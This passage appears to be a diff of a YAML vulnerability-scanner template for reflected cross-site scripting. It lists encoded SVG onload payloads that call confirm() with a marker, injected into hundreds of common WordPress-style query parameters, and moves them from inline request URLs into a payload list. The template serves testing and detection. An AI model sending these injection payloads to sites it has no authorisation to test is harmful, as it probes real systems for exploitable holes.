"{{BaseURL}}/?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E" - - "{{BaseURL}}/?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E" - - "{{BaseURL}}/?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E" - - "{{BaseURL}}/?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E" - - "{{BaseURL}}/?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E" - - "{{BaseURL}}/?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E" + - "{{BaseURL}}/?{{xss_param}}" + + payloads: + xss_param: + - "u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E" + - "send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E" + - "uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E" + - "t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E" + - "activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E" + - "rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E" + - "title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E" + - "redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E" + - "edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E" + - "next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E" + - "callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E" + - "name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E" + - "tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E" + - "order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E" + - "i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E" + - "subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E" + - "attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E" + - "sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E" + - 